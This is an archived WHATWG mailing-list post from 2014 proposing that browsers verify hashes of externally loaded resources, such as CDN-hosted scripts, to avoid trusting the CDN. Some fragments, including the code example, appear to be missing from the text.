[whatwg] Checksum for external resources
Eduardo Robles Elvira
edulix at agoravoting.com
Tue Mar 11 07:23:30 PDT 2014
I propose that external resources can be hashed. Before you jump on me,
I know that this has been proposed in the past  but I think it's that
time of the year to propose it again.
My concrete use-case is simple: I want to be able to use CDNs for common
administrators. That's why I'd like to be able to do something like this:
That's the only way I'd trust i.e. Google as a CDN, for example. Note,
these are files that should not change.
In a post-Snowden era, I think it's really important to improve the
security of the web. CDNs provide an useful service, but I don't want to
have to trust them. Yes, I want the cake, and eat it too.
Of course, this is just one use-case, there are others. This could be
applied also to <a> and maybe other tags too. And maybe this is not the
best layer to apply the checksum: another way could be to do this in
the URIs themselves , but I think that's more tricky..
But if you think that's way it should be done, then so be it. The bottom
line for me is: I don't know at what level to apply the fix, but I do
think we need a solution for this. Unless NSA thinks otherwise, of
 something like sha512+https://thehash;path/to/file
Eduardo Robles Elvira, +34 668 824 393, https://agoravoting.com
More information about the whatwg